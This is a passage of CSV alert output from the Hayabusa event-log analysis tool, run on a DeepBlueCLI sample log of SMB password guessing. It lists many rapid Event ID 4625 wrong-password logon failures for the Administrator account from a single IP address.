NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
